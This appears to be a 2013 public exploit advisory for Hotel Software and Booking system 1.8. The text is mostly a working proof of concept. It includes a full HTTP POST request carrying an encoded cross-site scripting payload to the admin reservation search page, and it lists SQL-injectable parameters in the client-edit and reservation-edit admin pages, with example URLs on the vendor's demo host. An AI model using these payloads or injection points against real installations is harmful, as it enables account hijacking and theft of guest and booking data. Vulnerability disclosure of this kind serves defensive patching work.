###########################################################################################
# Exploit Title: Hotel Software and Booking system 1.8 - SQL Injection /
Cross Site Scripting
# Date: 21 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.cbhotel.eu/
# Tested on: Win8 & Linux Mint
# Affected Version : 1.8 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev, SeguridadBlanca (Dedalo)
###########################################################################################
*Cross Site Scripting:*
Archivos Afectados Afectados
http://localhost/cbadm/reservations/index.php?ac=search
-------------------------------------------------------------------
PoC:
*Cross Site Scripting Post.*
URL: http://demo.cbhotel.eu/cbadm/reservations/index.php?ac=search
Host: demo.cbhotel.eu
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101
Firefox/23.0 AlexaToolbar/alxf-2.18
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.cbhotel.eu/cbadm/adm_main.php
Cookie: PHPSESSID=flp86mf2huj240qp6hj34ojgp3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
-------------------------------------------------------------------
s=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&button2=search&ss=ok
-------------------------------------------------------------------
*SQL Injection*
http://localhost/cbadm/clients/edit_client.php?id=1(SQL Injection)
Example:
http://demo.cbhotel.eu/cbadm/clients/edit_client.php?id=1
http://localhost/cbadm/reservations/editresx.php?ac=chrooms&id=OP5OC8Q&tip=DBL&room=344(SQLInjection)
Example:
http://demo.cbhotel.eu/cbadm/reservations/editresx.php?ac=chrooms&id=OP5OC8Q&tip=DBL&room=343(SQLInjection)
-------------------------------------------------------------------
Example:
http://www.cbhotel.eu/demo.php
--------------------------------------------------------------------
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*